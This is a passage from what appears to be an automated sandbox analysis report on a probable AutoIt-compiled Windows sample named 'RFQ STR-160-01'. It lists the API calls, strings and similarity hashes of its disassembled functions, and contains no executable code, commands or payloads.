              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _wcslen$BuffCharLower
              • String ID: cdecl$none$stdcall$winapi
              • API String ID: 707087890-567219261
              • Opcode ID: a04e3551582b92150ff9c8450fc8dccc445a483302e3a2976c5e0fdd56b4bc9a
              • Instruction ID: dba00dfe44771a9d4cc2a56e4ac724d89933be89b8828150bb5610006c1428a6
              • Opcode Fuzzy Hash: a04e3551582b92150ff9c8450fc8dccc445a483302e3a2976c5e0fdd56b4bc9a
              • Instruction Fuzzy Hash: 5E517F31A001169ECF24DF68C9508FEB7A6BF65724B284229E826A73C5DB35DD81C790
              APIs
              • CoInitialize.OLE32 ref: 00613774
              • CoUninitialize.OLE32 ref: 0061377F
              • CoCreateInstance.OLE32(?,00000000,00000017,0062FB78,?), ref: 006137D9
              • IIDFromString.OLE32(?,?), ref: 0061384C
              • VariantInit.OLEAUT32(?), ref: 006138E4
              • VariantClear.OLEAUT32(?), ref: 00613936
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
              • API String ID: 636576611-1287834457
              • Opcode ID: feda6d608bffae00eea0783d098c0438c2932d199d8c46a7404cf82a66f89f68
              • Instruction ID: b38d1736d94a8139f54e3f4acf7b9cf2dcdddfc61bd75556687ab519f6c95eb6
              • Opcode Fuzzy Hash: feda6d608bffae00eea0783d098c0438c2932d199d8c46a7404cf82a66f89f68
              • Instruction Fuzzy Hash: 8361C1702087119FD710DF54C848BAABBEAEF89710F04481DF9869B391D770EE89CB96
              APIs
                • Part of subcall function 005A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005A9BB2
                • Part of subcall function 005A912D: GetCursorPos.USER32(?), ref: 005A9141
                • Part of subcall function 005A912D: ScreenToClient.USER32(00000000,?), ref: 005A915E
                • Part of subcall function 005A912D: GetAsyncKeyState.USER32(00000001), ref: 005A9183
                • Part of subcall function 005A912D: GetAsyncKeyState.USER32(00000002), ref: 005A919D
              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00628B6B
              • ImageList_EndDrag.COMCTL32 ref: 00628B71
              • ReleaseCapture.USER32 ref: 00628B77
              • SetWindowTextW.USER32(?,00000000), ref: 00628C12
              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00628C25
              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00628CFF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
              • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#f
              • API String ID: 1924731296-3629574208
              • Opcode ID: 3138e8a7d3f7ff2df65c948676af55ca5e6860ca6e32b9457a6b32854b29876e
              • Instruction ID: bdaa30dfa55daba598e9b0fea976c3af786b8d80d0afdd8da8eb408d8b584238
              • Opcode Fuzzy Hash: 3138e8a7d3f7ff2df65c948676af55ca5e6860ca6e32b9457a6b32854b29876e
              • Instruction Fuzzy Hash: 1E519C70205714AFD710DF14DC5AFAE7BE6FB88710F00062DF9569B2A1CB709904CBA2
              APIs
              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 006033CF
                • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 006033F0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: LoadString$_wcslen
              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
              • API String ID: 4099089115-3080491070
              • Opcode ID: 29ad1285ca457257d03bee27b2cb9935ccb56e395e9c9e52eee6db59db2d042d
              • Instruction ID: 20774a4b4c6800f2eedfe022ab1218f7dbff74eceeb8455d8d1779a2a0be3668
              • Opcode Fuzzy Hash: 29ad1285ca457257d03bee27b2cb9935ccb56e395e9c9e52eee6db59db2d042d
              • Instruction Fuzzy Hash: 1451DF3184020AAADF15EBE0CD4AEEEBB7AFF44341F204165F505721A2EB352F58CB60
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _wcslen$BuffCharUpper
              • String ID: APPEND$EXISTS$KEYS$REMOVE
              • API String ID: 1256254125-769500911
              • Opcode ID: 7801358eb44b2a17a68786624aaa634ae93d09145266ec877a01eeec47518825
              • Instruction ID: b97f1284de9566632b7d68e578f979132996d0d57619c95833c321c6a8f18920
              • Opcode Fuzzy Hash: 7801358eb44b2a17a68786624aaa634ae93d09145266ec877a01eeec47518825
              • Instruction Fuzzy Hash: 4041C732A0102BDADB206F7DCC905BE7FA5BFA4794B244229E621D7284F739CD81C790
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 006053A0
              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00605416
              • GetLastError.KERNEL32 ref: 00605420
              • SetErrorMode.KERNEL32(00000000,READY), ref: 006054A7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Error$Mode$DiskFreeLastSpace
              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
              • API String ID: 4194297153-14809454
              • Opcode ID: 23e92c44d0ae4aebe5822d0932f88dfb79540636f6e3abdb2f1acba8c3dce70e
              • Instruction ID: b1f8e6ebe62f9633ac0c7aba2677eedb3706fd5d9802527b7ec2808b663cf65c
              • Opcode Fuzzy Hash: 23e92c44d0ae4aebe5822d0932f88dfb79540636f6e3abdb2f1acba8c3dce70e
              • Instruction Fuzzy Hash: 5C316935A406059FCB14DF68C489AEBBBF6EB44315F548069E806CB392DA70DD86CB91
              APIs
              • CreateMenu.USER32 ref: 00623C79
              • SetMenu.USER32(?,00000000), ref: 00623C88
              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00623D10
              • IsMenu.USER32(?), ref: 00623D24
              • CreatePopupMenu.USER32 ref: 00623D2E
              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00623D5B
              • DrawMenuBar.USER32 ref: 00623D63
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Menu$CreateItem$DrawInfoInsertPopup
              • String ID: 0$F
              • API String ID: 161812096-3044882817
              • Opcode ID: 6c26e76c86b7220315a2c3c7e7e08bcb5465ba1a1278f9adac23861acc36c5e1
              • Instruction ID: 52d7c4b4fbbf414a177ad09834ce5a48c99b3b55454a006cf4646c18bfbfec05
              • Opcode Fuzzy Hash: 6c26e76c86b7220315a2c3c7e7e08bcb5465ba1a1278f9adac23861acc36c5e1
              • Instruction Fuzzy Hash: D9416D75A01A19AFDB24CF64E844AEA7BB6FF49350F140428F946AB360D774EA11CF90
              APIs
              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00623A9D
              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00623AA0
              • GetWindowLongW.USER32(?,000000F0), ref: 00623AC7
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00623AEA
              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00623B62
              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00623BAC
              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00623BC7
              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00623BE2
              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00623BF6
              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00623C13
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageSend$LongWindow
              • String ID:
              • API String ID: 312131281-0
              • Opcode ID: 21fd85a29714d126aab29f5772512fe87c3bcd4a93f7dbcd242b9730d969ead8
              • Instruction ID: 27e9db9be74c430d057e653bb10c12f5f104abcb6b1b9de19fa9b8e3194d310c
              • Opcode Fuzzy Hash: 21fd85a29714d126aab29f5772512fe87c3bcd4a93f7dbcd242b9730d969ead8
              • Instruction Fuzzy Hash: 96618B75A00628AFDB10DFA8DC81EEE77B9EB09700F144199FA15AB3A1C774AE41DF50
              APIs
              • _free.LIBCMT ref: 005C2C94
                • Part of subcall function 005C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000), ref: 005C29DE
                • Part of subcall function 005C29C8: GetLastError.KERNEL32(00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000,00000000), ref: 005C29F0
              • _free.LIBCMT ref: 005C2CA0
              • _free.LIBCMT ref: 005C2CAB
              • _free.LIBCMT ref: 005C2CB6
              • _free.LIBCMT ref: 005C2CC1
              • _free.LIBCMT ref: 005C2CCC
              • _free.LIBCMT ref: 005C2CD7
              • _free.LIBCMT ref: 005C2CE2
              • _free.LIBCMT ref: 005C2CED
              • _free.LIBCMT ref: 005C2CFB
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: d6ee96bb91fc351e5ade815280c0f1cacf1f32a04251b23dc55e199d638f661e
              • Instruction ID: 4bf37b551da5e27e253514703a7af2146ae63af82a2327a4e22bdee3c4ffded8
              • Opcode Fuzzy Hash: d6ee96bb91fc351e5ade815280c0f1cacf1f32a04251b23dc55e199d638f661e
              • Instruction Fuzzy Hash: 6E11A476100109BFCB02EF94D886EDD3FA5FF45350F4144A9FA489F222DA31EE909B90
              APIs
              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00591459
              • OleUninitialize.OLE32(?,00000000), ref: 005914F8
              • UnregisterHotKey.USER32(?), ref: 005916DD
              • DestroyWindow.USER32(?), ref: 005D24B9
              • FreeLibrary.KERNEL32(?), ref: 005D251E
              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 005D254B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
              • String ID: close all
              • API String ID: 469580280-3243417748
              • Opcode ID: 48e5fe45413b155a7f027ec2a66a9ae76f9e52b6f649f78dbbe48d992e294531
              • Instruction ID: c1343b30f7d13e0686e7c869793e6f7579927647edffdd1de9cb4a717ac4576c
              • Opcode Fuzzy Hash: 48e5fe45413b155a7f027ec2a66a9ae76f9e52b6f649f78dbbe48d992e294531
              • Instruction Fuzzy Hash: 71D179306016238FCF29EF18D499A29FBA5BF55310F1442AEE44AAB352CB30ED12CF54
              APIs
              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00607FAD
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00607FC1
              • GetFileAttributesW.KERNEL32(?), ref: 00607FEB
              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00608005
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00608017
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00608060
              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 006080B0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CurrentDirectory$AttributesFile
              • String ID: *.*
              • API String ID: 769691225-438819550
              • Opcode ID: d7184e625da197f61748405004b88179b847b373de8932c96e0228fe04c06da5
              • Instruction ID: 35b290e4595f5874d8901188fb6bb8e1f424bf114c4b86affc21ed942034c41f
              • Opcode Fuzzy Hash: d7184e625da197f61748405004b88179b847b373de8932c96e0228fe04c06da5
              • Instruction Fuzzy Hash: DE819F729482059FCB28EF14C8549AFB7EABF88310F14486EF885C7291EB35ED45CB52
              APIs
              • SetWindowLongW.USER32(?,000000EB), ref: 00595C7A
                • Part of subcall function 00595D0A: GetClientRect.USER32(?,?), ref: 00595D30
                • Part of subcall function 00595D0A: GetWindowRect.USER32(?,?), ref: 00595D71
                • Part of subcall function 00595D0A: ScreenToClient.USER32(?,?), ref: 00595D99
              • GetDC.USER32 ref: 005D46F5
              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 005D4708
              • SelectObject.GDI32(00000000,00000000), ref: 005D4716
              • SelectObject.GDI32(00000000,00000000), ref: 005D472B
              • ReleaseDC.USER32(?,00000000), ref: 005D4733
              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 005D47C4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
              • String ID: U
              • API String ID: 4009187628-3372436214
              • Opcode ID: 3cafa09b524ff85ee6cb83c4eddf28043a924cd81cb2fa1dfac2dbe7f1f71c36
              • Instruction ID: f2ad03646fccc23fbf2d6482e93101377396e3178b513d63c762c6f6d0cb80fd
              • Opcode Fuzzy Hash: 3cafa09b524ff85ee6cb83c4eddf28043a924cd81cb2fa1dfac2dbe7f1f71c36
              • Instruction Fuzzy Hash: 4571CC31400605DFCF328F68C984ABA7FB6FF4A361F18426BE9565A2A6D3318C52DF50
              APIs
              • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 006035E4
                • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
              • LoadStringW.USER32(00662390,?,00000FFF,?), ref: 0060360A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: LoadString$_wcslen
              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
              • API String ID: 4099089115-2391861430
              • Opcode ID: a60b49cb87777874082fb395f4993b8fed95f4192c2e0e13dd2b74a8b5b41ef6
              • Instruction ID: 05ad303d813e93faf6c0e21812a2d95696c1df6a041cfdfdc0d5e40f3d24840d
              • Opcode Fuzzy Hash: a60b49cb87777874082fb395f4993b8fed95f4192c2e0e13dd2b74a8b5b41ef6
              • Instruction Fuzzy Hash: 9A51907184061ABBCF14EBA0CC46EEEBF7ABF54301F144129F505722A1EB711A99DFA0
              APIs
              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0060C272
              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0060C29A
              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0060C2CA
              • GetLastError.KERNEL32 ref: 0060C322
              • SetEvent.KERNEL32(?), ref: 0060C336
              • InternetCloseHandle.WININET(00000000), ref: 0060C341
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
              • String ID:
              • API String ID: 3113390036-3916222277
              • Opcode ID: 48c323302adde9d654d9e4dcc5494fcbab2696d58ca3f293f2fb9dcf94c6e899
              • Instruction ID: 3c6e33701cd74974e28414366f7db78fd191359042d13de449db99c7dfd2b1e2
              • Opcode Fuzzy Hash: 48c323302adde9d654d9e4dcc5494fcbab2696d58ca3f293f2fb9dcf94c6e899
              • Instruction Fuzzy Hash: 32317FB1540604AFD7299FA48C88AAF7BFEEF49764F10861EF44692280DB34DD069B61
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,005D3AAF,?,?,Bad directive syntax error,0062CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 005F98BC
              • LoadStringW.USER32(00000000,?,005D3AAF,?), ref: 005F98C3
                • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 005F9987
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: HandleLoadMessageModuleString_wcslen
              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
              • API String ID: 858772685-4153970271
              • Opcode ID: 84640d973935019f21ca0b89f0f91363214e8e307ac61ed155cb66ab359a2259
              • Instruction ID: a02d2b4090a14fdc4dc148ce92862d1c559d54bfb97d6e649f986b9e9c9901a8
              • Opcode Fuzzy Hash: 84640d973935019f21ca0b89f0f91363214e8e307ac61ed155cb66ab359a2259
              • Instruction Fuzzy Hash: F321823184021EEBCF11AF90CC0AEFD7B7AFF54301F04446AF515620A1DB759618CB60
              APIs
              • GetParent.USER32 ref: 005F20AB
              • GetClassNameW.USER32(00000000,?,00000100), ref: 005F20C0
              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 005F214D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ClassMessageNameParentSend
              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
              • API String ID: 1290815626-3381328864
              • Opcode ID: e0a6e0bef081e0cf3345b49de694057c56188efb195d98af04d37a85aa9a1589
              • Instruction ID: 3e8a6a97549bb92d44c89d57c9481e59c2617df07bf12c44ae45568ca9ff8f23
              • Opcode Fuzzy Hash: e0a6e0bef081e0cf3345b49de694057c56188efb195d98af04d37a85aa9a1589
              • Instruction Fuzzy Hash: 681120B658470BBAFA112220DC1FDF67F9DFF05325F210115FB05A50D2FE65A8469918
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
              • String ID:
              • API String ID: 1282221369-0
              • Opcode ID: e0c5ae96685104311a7a709806e0114e3013dbba9fd5d9b9cfd79cac92c2f227
              • Instruction ID: 00cb99e5d7063f2d76ed7e163f96ee4ddb4bd3d865c2f4314233ee529a5ab18d
              • Opcode Fuzzy Hash: e0c5ae96685104311a7a709806e0114e3013dbba9fd5d9b9cfd79cac92c2f227
              • Instruction Fuzzy Hash: C561F771904302AFDB21AFF49889F6A7FA5FF45350F04417DF949E7241E6719D418760
              APIs
